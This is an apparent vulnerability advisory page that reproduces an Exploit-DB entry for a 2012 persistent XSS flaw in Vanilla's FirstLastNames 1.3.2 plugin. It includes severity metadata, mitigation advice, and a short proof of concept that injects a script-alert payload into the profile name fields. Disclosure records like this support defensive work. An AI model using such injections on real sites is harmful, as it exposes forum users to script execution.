Vanilla FirstLastNames 1.3.2 Plugin Persistent XSS Vulnerability

vendor:

Vanilla

by:

Henry Hoggard

5.5

CVSS

MEDIUM

Persistent XSS

CWE

Product Name: Vanilla

Affected Version From: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2

Affected Version To: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2

Patch Exists: NO

Related CWE:

CPE: a:vanilla:vanilla:2.0.18.4

Metasploit:

Other Scripts:

Platforms Tested:

2012

Vanilla FirstLastNames 1.3.2 Plugin Persistent XSS Vulnerability

This vulnerability allows an attacker to inject malicious scripts into the first name or last name field on the Edit account page. When a user visits the attacker's page, the injected script will execute.

Mitigation:

Update to a version of Vanilla that is not affected by this vulnerability.

Source

Exploit-DB raw data:

# Title: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2

http://vanillaforums.org/addon/firstlastnames-plugin

# http://vanillaforums.org
#############################################################

On Edit your account enter your XSS String in either the first name or last name field.
Then if a user visits your page the XSS will execute.

http://target.tld/index.php?p=/profile/myprofile/1/user

XSS:
<script>alert('x')</script>

#############################################################

http://henryhoggard.co.uk